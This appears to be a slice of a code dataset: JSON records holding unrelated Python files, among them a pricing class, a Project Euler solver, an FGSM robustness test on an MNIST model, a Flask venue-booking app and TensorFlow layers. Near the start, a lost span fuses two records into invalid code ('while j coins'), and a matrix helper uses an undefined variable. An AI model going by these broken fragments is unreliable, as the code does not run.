\"mvr\"\n elif 
\"25,000\" in current_data:\n return_type = \"tier1\"\n elif \"25,001\" in current_data:\n return_type = \"tier2\"\n elif \"+\" in current_data:\n return_type = \"tier3\"\n\n return return_type\n\n def set_fee_value(self, value, type):\n if type == 'mvr':\n self.mvr_price = value\n\n if type == 'tier1':\n self.tier1_price = value\n\n if type == 'tier2':\n self.tier2_price = value\n\n if type == 'tier3':\n self.tier3_price = value\n\n def get_pricing_info(self, df, fee_columns):\n for fee_column in fee_columns:\n current_data = df[fee_column]\n type = self.get_fee_type(fee_column)\n # print(type)\n current_data = [x for x in current_data if x > 0]\n current_data = list(set(current_data))\n if len(current_data) == 0:\n # print('${:,.2f}'.format(0.00))\n self.set_fee_value(0.00, type)\n elif len(current_data) == 1:\n # all prices the same for a given channel\n # print('${:,.2f}'.format(current_data[0]))\n self.set_fee_value(current_data[0], type)\n elif len(current_data) > 1:\n # this is for different prices\n print(current_data)\n\n def write_channel_pricing_info(self):\n \"\"\"\n function to write the pricing information to the channel_products table\n :return:\n\n \"\"\"\n pass\n\n def print_pricing_info(self):\n print('MVR ' + '${:,.2f}'.format(self.mvr_price))\n print('Tier 1 ' + '${:,.2f}'.format(self.tier1_price))\n print('Tier 2 ' + '${:,.2f}'.format(self.tier2_price))\n print('Tier 3 ' + '${:,.2f}'.format(self.tier3_price))\n\n def print_children(self):\n for child in self.children:\n print('\\t' + child.child_name)\n print('\\t' + child.child_id)\n print('\\t' + child.mvr_fees)\n\n def print_channel_info(self):\n print('*********************')\n print(self.channel_name)\n print(self.channel_id)\n print(self.channel_type)\n self.print_children()\n\n\n","sub_path":"channel_partner_data_population/Channel.py","file_name":"Channel.py","file_ext":"py","file_size_in_byte":4742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"542766597","text":"# -*- coding: utf-8 -*-\ndef melinha (matriz):\n for i in range (0,matriz.shape[0],1):\n for i in range (0,matriz.shape[1],1):\n if matriz[i,j]==1:\n return(i)\ndef mecoluna (matriz):\n j=0\n while j coins:\n break\n factor = 1 if count % 2 == 1 else -1\n currentPartitions += factor * partitions[coins - small]\n if big <= coins:\n currentPartitions += factor * partitions[coins - big]\n count += 1\n partitions.append(currentPartitions % divisor)\n return coins\n\n def solution(self):\n return self.minCoinsWithPartitionsDivisibleBy(10**6)\n\n def test(self):\n assert self.minCoinsWithPartitionsDivisibleBy(7) == 5\n\nSolver = Problem078\n","sub_path":"Solutions/Problems 076-100/Problem078.py","file_name":"Problem078.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"78297448","text":"import MyModel\r\nimport torch\r\nimport torchvision\r\nimport torchvision.transforms as transforms\r\nimport torch.nn as nn\r\nimport numpy as np\r\nimport foolModel\r\n\r\ntoPIL=transforms.ToPILImage()\r\ntoTensor=transforms.ToTensor()\r\n# device configuration\r\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\r\n\r\n# load model\r\nnet = MyModel.LeNet_my(10).to(device)\r\n\r\n# load pretrained parameters\r\ncheckpoint = torch.load('../pretrainModel/ResNet_MNIST.ckpt',map_location = device)\r\nnet.load_state_dict(checkpoint)\r\n\r\ntest_data = torchvision.datasets.MNIST(root='../ImageData', 
train=False, transform=toTensor,\r\n                                       download=True) # download testing data set\r\n\r\nimageNum = len(test_data)\r\n\r\ntest_loader = torch.utils.data.DataLoader(dataset = test_data,\r\n                                          batch_size = 100,\r\n                                          shuffle = False)\r\n\r\ntotal = 0\r\ncorrect = 0\r\n\r\nfor i, (images,labels) in enumerate(test_loader):\r\n\r\n    netInput = torch.autograd.Variable(images,requires_grad = True)\r\n\r\n    grad_sign = foolModel.FGSM(net,netInput.to(device),labels.long().to(device))\r\n    image_perturbated = (images + 1*grad_sign.cpu()).numpy()\r\n    image_perturbated = np.clip(image_perturbated,0,1)\r\n    image_perturbated = torch.Tensor(image_perturbated).to(device)\r\n\r\n    net.eval()\r\n\r\n    outputs = net(image_perturbated)\r\n    _,predicted = torch.max(outputs.data, 1)\r\n\r\n    total += labels.size(0)\r\n    correct += (predicted.cpu() == labels).sum().item()\r\n\r\n\r\n    print(i)\r\n    pass\r\n\r\nprint('Test Accuracy of the model on the 10000 test images: {} %'.format(100 * correct / total))\r\n\r\nprint('finish')","sub_path":"classification/foolMNIST.py","file_name":"foolMNIST.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"584835592","text":"##\n## Pandas programming\n## ===========================================================================\n##\n## Build a table containing _c0 and a ','-separated\n## list of the values of columns _c5a\n## and _c5b (joined by ':') from the table tbl2.tsv\n## \n## Answer:\n## _c0 lista\n## 0 0 bbb:0,ddd:9,ggg:8,hhh:2,jjj:3\n## 1 1 aaa:3,ccc:2,ddd:0,hhh:9\n## ...\n## 38 38 eee:0,fff:9,iii:2\n## 39 39 ggg:3,hhh:8,jjj:5\n##\n## >>> Write your code from this point on <<<\n##\nimport pandas as pd\ndata = pd.read_csv('tbl2.tsv',sep='\\t')\ndata = data.sort_values(['_c0','_c5a'])\ndata['unidos'] = list(map(lambda a,b: str(a) + ':' + str(b), data['_c5a'], data['_c5b']))\ndata = data.groupby('_c0')['unidos'].apply(lambda a: ','.join(a)).reset_index()\ndata.columns = ['_c0','lista']\nprint(data)\n","sub_path":"04-pandas=1/q10=1/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"537595399","text":"import mock\nimport pytest\nfrom starlette.testclient import TestClient\n\nimport app.worker\nfrom app.db_models import sa\nfrom app.api.auth.api_v1 import get_current_user\n\n\n@pytest.mark.skip\n@pytest.mark.parametrize(\n    \"url\", [\"/bgm.tv/api.v0/subject/player/233593\", \"/bgm.tv/api.v0/ep/player/233593\",]\n)\ndef test_submit_subject_id_require_auth(client: TestClient, url):\n    r = client.put(\n        url, json={\"bangumi_id\": \"string\", \"source\": \"bilibili\", \"subject_id\": 288,}\n    )\n    assert r.status_code == 403, \"submitting a subject_id must require auth\"\n\n\n@pytest.mark.skip\ndef test_submit_subject_url(client: TestClient,):\n    async def 
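foolMNIST.py above calls foolModel.FGSM, but that module is not part of the record. A sketch of what such a helper typically looks like; this is an assumption reconstructed from the call site (the caller expects the sign of the input gradient back):

```python
import torch
import torch.nn as nn

def FGSM(net, inputs, labels):
    # Loss of the current predictions with respect to the true labels.
    loss = nn.CrossEntropyLoss()(net(inputs), labels)
    # torch.autograd.grad also works when `inputs` is a non-leaf tensor,
    # as happens when the caller moves the Variable to another device.
    grad, = torch.autograd.grad(loss, inputs)
    return grad.sign()
```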
mock_get_current_user():\n return sa.UserToken(user_id=233)\n\n client.app.dependency_overrides[get_current_user] = mock_get_current_user\n ep_id = 2891213\n url = \"https://www.bilibili.com/bangumi/play/ep276479\"\n with mock.patch(\"app.worker.submit_ep\"):\n r = client.put(f\"/bgm.tv/api.v0/ep/player/{ep_id}\", json={\"url\": url})\n assert r.status_code == 200, r.text\n app.worker.submit_ep.delay.assert_called_once_with(ep_id, url)\n\n assert r.status_code == 200, r.text\n","sub_path":"tests/app/api/bgm_tv/test_submit_player_page.py","file_name":"test_submit_player_page.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"632771768","text":"from rest_framework import permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"HEX API\",\n default_version='v1',\n description=\"API version 1 for Test Services\",\n contact=openapi.Contact(email=\"oliver.koyoc@gmail.com\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=False,\n permission_classes=(permissions.IsAuthenticated,),\n)\n","sub_path":"mutationAPI/swagger.py","file_name":"swagger.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"542854595","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nfrom globeos.scenes.basescene import basescene\nimport warnings\nimport os \nfrom globeos.managers.imagemanager import imagemanager\nimport pygame \n\nclass imagescene(basescene):\n def __init__(self, globe, screen, args={}):\n super(imagescene, self).__init__(globe, screen)\n self.imagemanager = imagemanager()\n \n if('filename' not in args):\n warnings.warn(\"No Image Selected - Loading Default\")\n filename = os.getcwd()+\"\\images\\globe2.jpg\"\n self.imagemanager.loadimage(filename)\n else:\n self.imagemanager.loadimage(args['filename'])\n return\n \n def run(self):\n while not self.done:\n hevent = None\n for event in pygame.event.get(): \n hevent = self.inputmanager.handleinput(event)\n super(imagescene, self).defaultevents(hevent)\n self.surfarr = self.imagemanager.setimage(self.globe, self.surfarr)\n super(imagescene, self).draw()\n return self.nextscenename\n \n","sub_path":"globeos/scenes/imagescene.py","file_name":"imagescene.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"607646371","text":"import os\nimport glob\nimport random\nimport numpy as np\nimport cv2\n\n\nclass Generator(object):\n sample = 'sample'\n label = 'label'\n augment = 'augment'\n\n # def __init__(self, path='/media/HDD-2T/DATA/ISBI_2019',labels=['cancer','normal'],folds = ['fold_1','fold_2','fold_3','fold_4'],type='train'):\n def __init__(self, path,labels,folds,type_set):\n '''\n example\n def __init__(self, path='/media/HDD-2T/DATA/ISBI_2019',labels=['cancer','normal'],folds = ['fold_1','fold_2','fold_3','fold_4'],type='train)\n '''\n self.type = type_set # 'train' or 'val'\n self.all_samples = self.generate_all_samples_dict(path, labels, folds)\n np.random.shuffle(self.all_samples['cancer'])\n np.random.shuffle(self.all_samples['normal'])\n self.length = len(self.all_samples['cancer']) + len(self.all_samples['normal'])\n self.pos_weight = len(self.all_samples['normal'])/len(self.all_samples['cancer'])\n print('>>>>>>>>>>>>>>. 
pos_weight: ', self.pos_weight)\n        print('num_cancer: ', len(self.all_samples['cancer']))\n        print('num_normal: ', len(self.all_samples['normal']))\n\n    def generate_all_samples_dict(self, path, labels, folds):\n        # builds a dictionary mapping each label to every sample path found in the given folds\n        all_samples = {}\n        \n        for label in labels:\n            all_samples[label] = []\n            for fold in folds:\n                sample_subject = glob.glob('{}/{}/{}/*'.format(path,fold,label))\n                all_samples[label]+=(sample_subject)\n        return all_samples\n\n    def get_next(self):\n        all_samples_names = list(self.all_samples.keys())\n\n        labels = {\n            'cancer': [0.0, 1.0],\n            'normal': [1.0, 0.0]\n        }\n        # labels = {\n        #     'cancer': [1.0, 0.0],\n        #     'normal': [0.0, 1.0]\n        # }\n\n        if self.type == 'train':\n            num_samples_cancer_used = 0\n            num_samples_normal_used = 0\n            while True:\n                # label = random.choice(all_samples_names) # 'cancer' or 'normal'\n                choose_cancer = random.random() > 2.0/3\n                if choose_cancer:\n                    label = 'cancer'\n                    # augment = False\n                else:\n                    label = 'normal'\n                    # augment = False\n                if label == 'cancer':\n                    sample = self.all_samples[label][num_samples_cancer_used]\n                    num_samples_cancer_used += 1\n                else:\n                    sample = self.all_samples[label][num_samples_normal_used]\n                    num_samples_normal_used += 1\n                \n                if num_samples_cancer_used == len(self.all_samples['cancer']):\n                    num_samples_cancer_used = 0\n                    np.random.shuffle(self.all_samples['cancer'])\n                \n                if num_samples_normal_used == len(self.all_samples['normal']):\n                    num_samples_normal_used = 0\n                    np.random.shuffle(self.all_samples['normal'])\n\n                # sample = random.choice(self.all_samples[label])\n                yield ({self.sample: sample,\n                        self.label: labels[label],\n                        self.augment: False})\n        \n        elif self.type == 'eval':\n            while True:\n                for sample in self.all_samples['cancer']:\n                    yield ({self.sample: sample,\n                            self.label: labels['cancer'],\n                            self.augment: False}) \n                for sample in self.all_samples['normal']:\n                    yield ({self.sample: sample,\n                            self.label: labels['normal'],\n                            self.augment: False})\n        \n        else:\n            raise ValueError('type must be \"train\" or \"eval\"')\n        # while True:\n        #     label = random.choice(all_samples_names) # 'cancer' or 'normal'\n\n        #     sample = random.choice(self.all_samples[label])\n\n        #     yield ({self.sample: sample,\n        #             self.label: labels[label]})\n# a = Generator()\n# b = a.get_next()\n# print(b)\n","sub_path":"evaluation/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":4233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"121378105","text":"#----------------------------------------------------------------------------#\n# Imports\n#----------------------------------------------------------------------------#\n\nimport json\nimport dateutil.parser\nimport babel\nimport re\nfrom flask import (Flask,\n                   render_template,\n                   request,\n                   Response,\n                   flash,\n                   redirect,\n                   url_for,\n                   abort,\n                   jsonify)\nfrom flask_moment import Moment\nfrom flask_sqlalchemy import SQLAlchemy\nimport logging\nfrom logging import Formatter, FileHandler\nfrom flask_wtf import Form\nfrom forms import *\nimport sys\nfrom flask_migrate import Migrate\nfrom datetime import datetime\n\n#----------------------------------------------------------------------------#\n# App Config.\n#----------------------------------------------------------------------------#\n\n# Set Flask configuration\napp = Flask(__name__)\nmoment = Moment(app)\napp.config.from_object('config')\napp.config['SQLALCHEMY_ECHO'] = False\n\n# Connect to local postgresql 
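For reference, a hypothetical driver for the Generator class above. The data root and fold names are placeholders, and the class assumes the 'cancer'/'normal' folders it shuffles in __init__ actually exist on disk:

```python
gen = Generator('/data/ISBI_2019', ['cancer', 'normal'],
                ['fold_1', 'fold_2'], 'train')
batch_iter = gen.get_next()
for _ in range(3):
    item = next(batch_iter)
    print(item[Generator.sample], item[Generator.label])
```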
database\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgres://postgres@localhost:5432/fyyur'\n\n# Import models\nfrom models import db, Venue, Artist, Show\n\n# Initialize SQLAlchemy with current app\ndb.init_app(app)\n\n# Instantiate migration object\nmigrate = Migrate(app, db)\n\n#----------------------------------------------------------------------------#\n# Filters.\n#----------------------------------------------------------------------------#\n\ndef format_datetime(value, format='medium'):\n    date = dateutil.parser.parse(value)\n    if format == 'full':\n        format=\"EEEE MMMM, d, y 'at' h:mma\"\n    elif format == 'medium':\n        format=\"EE MM, dd, y h:mma\"\n    return babel.dates.format_datetime(date, format)\n\napp.jinja_env.filters['datetime'] = format_datetime\n\n#----------------------------------------------------------------------------#\n# Controllers.\n#----------------------------------------------------------------------------#\n\n@app.route('/')\ndef index():\n    return render_template('pages/home.html')\n\n# Venues\n# ----------------------------------------------------------------\n\n@app.route('/venues')\ndef venues():\n    data = []\n    cities = []\n    venues = db.session.query(Venue).all()\n    shows = db.session.query(Show).all()\n    for venue in venues:\n        current_venue = Venue.query.get(venue.id)\n        city = current_venue.city\n        if city in cities:\n            pass\n        else:\n            state = current_venue.state\n            local_venues_list = []\n            all_local_venues = Venue.query.filter_by(city=city).all()\n            for local_venue in all_local_venues:\n                local_venues_list.append(\n                    {\n                        \"id\": local_venue.id,\n                        \"name\": local_venue.name,\n                        \"num_upcoming_shows\": Show.query.filter_by(venue_id=local_venue.id).count()\n                    }\n                )\n            data.append(\n                {\n                    \"city\": city,\n                    \"state\": state,\n                    \"venues\": local_venues_list\n                }\n            )\n            cities.append(city)\n    return render_template('pages/venues.html', areas = data)\n\n@app.route('/venues/search', methods = ['POST'])\ndef search_venues():\n    search_term = request.get_json()['search_term']\n    matches = Venue.query.filter(Venue.name.ilike('%' + search_term + '%')).all()\n    match_count = len(matches)\n    match_details = []\n    for match in matches:\n        current_time = datetime.now()\n        upcoming_shows = []\n        shows = match.shows\n        for show in shows:\n            show_datetime = datetime.strptime(show.start_time, '%Y-%m-%d %H:%M:%S')\n            if show_datetime > current_time:\n                upcoming_shows.append(show)\n        count_upcoming_shows = len(upcoming_shows)\n        match_details.append({\n            'id': match.id,\n            'name': match.name,\n            'num_upcoming_shows': count_upcoming_shows\n        })\n    response = {\n        'count': match_count,\n        'data': match_details\n    }\n    return render_template('pages/search_venues.html', results=response, search_term=request.form.get('search_term', ''))\n\n@app.route('/venues/<int:venue_id>')\ndef show_venue(venue_id):\n    # Shows the venue page with the given venue_id\n    data = Venue.query.get(venue_id)\n    print(data)\n    # Split into multiple discrete genres using a delimiter\n    genres_concatenated = data.genres\n    data.genres = re.split(',', genres_concatenated)\n    # Append data on past and upcoming shows\n    # shows = Show.query.filter_by(venue_id=venue_id).all()\n    num_upcoming_shows = 0\n    upcoming_shows = []\n    past_shows = []\n    current_time = datetime.now()\n    for show in data.shows:\n        show.artist_image_link = show.artist.image_link\n        show.artist_name = show.artist.name\n        show_datetime = datetime.strptime(show.start_time, '%Y-%m-%d %H:%M:%S')\n        if show_datetime > current_time:\n            num_upcoming_shows += 1\n            upcoming_shows.append(show)\n        elif show_datetime <= 
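The past/upcoming partitioning above is repeated almost verbatim for venues and artists throughout this file; a hypothetical helper (not part of the original app) that the later handlers could share:

```python
from datetime import datetime

def split_shows(shows, fmt='%Y-%m-%d %H:%M:%S'):
    # Partition show objects by whether their start_time lies in the future.
    now = datetime.now()
    past = [s for s in shows if datetime.strptime(s.start_time, fmt) <= now]
    upcoming = [s for s in shows if datetime.strptime(s.start_time, fmt) > now]
    return past, upcoming
```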
current_time:\n            past_shows.append(show)\n    data.past_shows = past_shows\n    data.upcoming_shows = upcoming_shows\n    data.upcoming_shows_count = num_upcoming_shows\n    return render_template('pages/show_venue.html', venue=data)\n\n# Create Venue\n# ----------------------------------------------------------------\n\n@app.route('/venues/create', methods=['GET'])\ndef create_venue_form():\n    form = VenueForm()\n    return render_template('forms/new_venue.html', form=form)\n\n@app.route('/venues/create', methods=['POST'])\ndef create_venue_submission():\n    error = False\n    body = {}\n    try:\n        venue_name = request.get_json()['name']\n        venue_city = request.get_json()['city']\n        venue_state = request.get_json()['state']\n        venue_address = request.get_json()['address']\n        venue_phone = request.get_json()['phone']\n        venue_genres = request.get_json()['genres']\n        venue_facebook_link = request.get_json()['facebook_link']\n        new_venue = Venue(name = venue_name, city = venue_city, state = venue_state, address = venue_address, phone = venue_phone, genres = venue_genres, facebook_link = venue_facebook_link)\n        # Add new venue record to db\n        db.session.add(new_venue)\n        db.session.commit()\n    except:\n        error = True\n        db.session.rollback()\n        print(sys.exc_info())\n    finally:\n        db.session.close()\n    if error:\n        abort(400)\n    else:\n        flash('Venue ' + venue_name + ' was successfully listed!')\n    return render_template('pages/home.html')\n\n@app.route('/venues/<int:venue_id>', methods=['DELETE'])\ndef delete_venue(venue_id):\n    error = False\n    body = {}\n    try:\n        venue_to_delete = Venue.query.get(venue_id)\n        # Delete venue\n        db.session.delete(venue_to_delete)\n        db.session.commit()\n    except:\n        error = True\n        db.session.rollback()\n        print(sys.exc_info())\n    finally:\n        db.session.close()\n    if error:\n        flash('Sorry, this venue could not be deleted.')\n        abort(400)\n    else:\n        flash('Venue was successfully deleted.')\n    return render_template('pages/home.html')\n\n# Artists\n# ----------------------------------------------------------------\n@app.route('/artists')\ndef artists():\n    data = Artist.query.order_by('id').all()\n    return render_template('pages/artists.html', artists=data)\n\n@app.route('/artists/search', methods=['POST'])\ndef search_artists():\n    search_term = request.get_json()['search_term']\n    matches = Artist.query.filter(Artist.name.ilike('%' + search_term + '%')).all()\n    match_count = len(matches)\n    match_details = []\n    for match in matches:\n        current_time = datetime.now()\n        upcoming_shows = []\n        shows = match.shows\n        for show in shows:\n            show_datetime = 
 for show in shows:\n show_datetime = datetime.strptime(show.start_time, '%Y-%m-%d %H:%M:%S')\n if show_datetime > current_time:\n num_upcoming_shows += 1\n upcoming_shows.append({\n \"id\": show.id,\n \"artist_id\": show.artist_id,\n \"artist\": show.artist,\n \"venue_id\": show.venue_id,\n \"venue_name\": show.venue.name,\n \"venue_image_link\": show.venue.image_link,\n \"start_time\": show.start_time\n })\n elif show_datetime <= current_time:\n past_shows.append({\n \"id\": show.id,\n \"artist_id\": show.artist_id,\n \"artist\": show.artist,\n \"venue_id\": show.venue_id,\n \"venue_name\": show.venue.name,\n \"venue_image_link\": show.venue.image_link,\n \"start_time\": show.start_time\n })\n data.append(\n {\n \"id\": current_artist.id,\n \"name\": current_artist.name,\n \"genres\": current_artist_genres_list,\n \"city\": current_artist.city,\n \"state\": current_artist.state,\n \"phone\": current_artist.phone,\n \"website\": current_artist.website,\n \"facebook_link\": current_artist.facebook_link,\n \"seeking_venue\": current_artist.seeking_venues,\n \"image_link\": current_artist.image_link,\n \"upcoming_shows_count\": num_upcoming_shows,\n \"upcoming_shows\": upcoming_shows,\n \"past_shows\": past_shows\n }\n )\n # Return the first list item rather than a list of multiple artists\n data = data[0]\n return render_template('pages/show_artist.html', artist = data)\n\n# Update Artist\n# ----------------------------------------------------------------\n@app.route('/artists/<int:artist_id>/edit', methods=['GET'])\ndef edit_artist(artist_id):\n form = ArtistForm()\n artist = Artist.query.get(artist_id)\n return render_template('forms/edit_artist.html', form=form, artist=artist)\n\n@app.route('/artists/<int:artist_id>/edit', methods=['POST'])\ndef edit_artist_submission(artist_id):\n error = False\n body = {}\n try:\n new_artist_name = request.get_json()['name']\n new_artist_city = request.get_json()['city']\n new_artist_state = request.get_json()['state']\n new_artist_phone = request.get_json()['phone']\n new_artist_genres = request.get_json()['genres']\n new_artist_facebook_link = request.get_json()['facebook-link']\n db.session.query(Artist).filter(Artist.id == artist_id).update(\n {\n 'name': new_artist_name,\n 'city': new_artist_city,\n 'state': new_artist_state,\n 'phone': new_artist_phone,\n 'genres': new_artist_genres,\n 'facebook_link': new_artist_facebook_link\n }\n )\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n if error:\n
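 # the failed transaction was already rolled back in the except block\n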
 flash('Something went wrong. Please double-check your submission and try again.')\n abort(400)\n else:\n flash('Artist ' + new_artist_name + ' was successfully updated!')\n return render_template('pages/home.html')\n\n@app.route('/venues/<int:venue_id>/edit', methods=['GET'])\ndef edit_venue(venue_id):\n form = VenueForm()\n venue = Venue.query.get(venue_id)\n return render_template('forms/edit_venue.html', form=form, venue=venue)\n\n@app.route('/venues/<int:venue_id>/edit', methods=['POST'])\ndef edit_venue_submission(venue_id):\n error = False\n body = {}\n try:\n new_venue_name = request.get_json()['name']\n new_venue_city = request.get_json()['city']\n new_venue_state = request.get_json()['state']\n new_venue_phone = request.get_json()['phone']\n new_venue_genres = request.get_json()['genres']\n new_venue_facebook_link = request.get_json()['facebook-link']\n db.session.query(Venue).filter(Venue.id == venue_id).update(\n {\n 'name': new_venue_name,\n 'city': new_venue_city,\n 'state': new_venue_state,\n 'phone': new_venue_phone,\n 'genres': new_venue_genres,\n 'facebook_link': new_venue_facebook_link\n }\n )\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n if error:\n flash('Something went wrong. Please double-check your submission and try again.')\n abort(400)\n else:\n flash('Venue ' + new_venue_name + ' was successfully updated!')\n return render_template('pages/home.html')\n\n# Create Artist\n# ----------------------------------------------------------------\n\n@app.route('/artists/create', methods=['GET'])\ndef create_artist_form():\n form = ArtistForm()\n return render_template('forms/new_artist.html', form=form)\n\n@app.route('/artists/create', methods=['POST'])\ndef create_artist_submission():\n error = False\n body = {}\n try:\n new_artist_name = request.get_json()['name']\n new_artist_city = request.get_json()['city']\n new_artist_state = request.get_json()['state']\n new_artist_phone = request.get_json()['phone']\n new_artist_genres = request.get_json()['genres']\n new_artist_facebook_link = request.get_json()['facebook-link']\n new_artist = Artist(name = new_artist_name, city = new_artist_city, state = new_artist_state, phone = new_artist_phone, genres = new_artist_genres, facebook_link = new_artist_facebook_link)\n # Add new artist record to db\n db.session.add(new_artist)\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n if error:\n
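 # nothing was committed, so just report the failure to the user\n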
 flash('Something went wrong. Please double-check your submission and try again.')\n abort(400)\n else:\n flash('Artist ' + new_artist_name + ' was successfully listed!')\n return render_template('pages/home.html')\n\n@app.route('/artists/<int:artist_id>', methods=['DELETE'])\ndef delete_artist(artist_id):\n error = False\n body = {}\n try:\n artist_to_delete = Artist.query.get(artist_id)\n # Delete artist\n db.session.delete(artist_to_delete)\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n if error:\n flash('Sorry, this artist could not be deleted.')\n abort(400)\n else:\n flash('Artist was successfully deleted.')\n return render_template('pages/home.html')\n\n\n# Shows\n#----------------------------------------------------------------------------#\n# Displays list of shows at /shows\n@app.route('/shows')\ndef shows():\n shows = Show.query.all()\n data = []\n for show in shows:\n venue = db.session.query(Venue).filter_by(id=show.venue_id).first()\n artist = db.session.query(Artist).filter_by(id=show.artist_id).first()\n data.append(\n {\n \"venue_id\": show.venue_id,\n \"venue_name\": venue.name,\n \"artist_id\": show.artist_id,\n \"artist_name\": artist.name,\n \"artist_image_link\": artist.image_link,\n \"start_time\": show.start_time\n }\n )\n return render_template('pages/shows.html', shows=data)\n\n@app.route('/shows/create')\ndef create_shows():\n # Renders form. Do not touch.\n form = ShowForm()\n return render_template('forms/new_show.html', form=form)\n\n@app.route('/shows/create', methods=['POST'])\ndef create_show_submission():\n # Called to create new shows in the db, upon submitting new show listing form\n error = False\n body = {}\n try:\n show_artist_id = request.get_json()['artist_id']\n show_venue_id = request.get_json()['venue_id']\n show_start_time = request.get_json()['start_time']\n new_show = Show(artist_id = show_artist_id, venue_id = show_venue_id, start_time = show_start_time)\n # Add new show record to db\n db.session.add(new_show)\n db.session.commit()\n # Return response object\n body['artist_id'] = show_artist_id\n body['venue_id'] = show_venue_id\n body['start_time'] = show_start_time\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n if error:\n
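 # flash before aborting so the message survives to the error page\n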
 flash('Something went wrong. Please double-check your submission and try again.')\n abort(400)\n else:\n flash('Show was successfully listed!')\n return render_template('pages/home.html', error=error)\n\n#----------------------------------------------------------------------------#\n# Error handlers\n#----------------------------------------------------------------------------#\n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template('errors/404.html'), 404\n\n@app.errorhandler(500)\ndef server_error(error):\n return render_template('errors/500.html'), 500\n\nif not app.debug:\n file_handler = FileHandler('error.log')\n file_handler.setFormatter(\n Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n )\n app.logger.setLevel(logging.INFO)\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info('errors')\n\n#----------------------------------------------------------------------------#\n# Launch.\n#----------------------------------------------------------------------------#\n\n# Default port:\nif __name__ == '__main__':\n app.run()\n\n# Or specify port manually:\n'''\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n'''\n","sub_path":"projects/01_fyyur/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":17502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"343384483","text":"import tensorflow as tf\n\nclass SpanBegin(tf.keras.layers.Layer):\n\n def build(self, input_shape):\n last_dim = input_shape[0][-1] + input_shape[1][-1]\n inn_shape_dense1 = input_shape[0][:-1] + (last_dim, )\n self.dense1 = tf.keras.layers.Dense(1)\n self.dense1.build(inn_shape_dense1)\n\n super().build(input_shape)\n\n def call(self, inputs):\n merged_ctx, modeled_ctx = inputs\n\n span_begin_inn = tf.concat([merged_ctx, modeled_ctx], axis=-1)\n span_begin_weight = tf.keras.layers.TimeDistributed(self.dense1)(span_begin_inn)\n span_begin_weight = tf.squeeze(span_begin_weight, axis=-1)\n span_begin_prob = tf.keras.activations.softmax(span_begin_weight)\n\n return span_begin_prob\n\n def compute_output_shape(self, input_shape):\n return input_shape[0][:-1]\n\nclass SpanEnd(tf.keras.layers.Layer):\n\n def build(self, input_shape):\n emb_size = input_shape[0][-1] // 2\n inn_shape_bilstm = input_shape[0][:-1] + (emb_size * 14, )\n inn_shape_dense = input_shape[0][:-1] + (emb_size * 10, )\n\n self.bilstm = tf.keras.layers.Bidirectional(\n tf.keras.layers.LSTM(emb_size, return_sequences=True))\n self.bilstm.build(inn_shape_bilstm)\n\n self.dense = tf.keras.layers.Dense(1)\n self.dense.build(inn_shape_dense)\n\n super().build(input_shape)\n\n def call(self, inputs):\n cencode, merged_ctx, modeled_ctx, span_begin_prob = inputs\n\n _span_begin_prob = tf.expand_dims(span_begin_prob, axis=-1)\n weighted_sum = tf.math.reduce_sum(_span_begin_prob * modeled_ctx, axis=-2)\n\n weighted_ctx = tf.expand_dims(weighted_sum, axis=1)\n tile_shape = tf.concat([[1], [cencode.shape[1]], [1]], axis=0)\n weighted_ctx = tf.tile(weighted_ctx, tile_shape)\n m1 = modeled_ctx * weighted_ctx\n\n span_end_repr = tf.concat([merged_ctx, modeled_ctx, weighted_ctx, m1], axis=-1)\n span_end_repr = self.bilstm(span_end_repr)\n span_end_inn = tf.concat([merged_ctx, span_end_repr], axis=-1)\n span_end_weights = tf.keras.layers.TimeDistributed(self.dense)(span_end_inn)\n span_end_prob = tf.keras.activations.softmax(tf.squeeze(span_end_weights, axis=-1))\n\n return span_end_prob\n\n def 
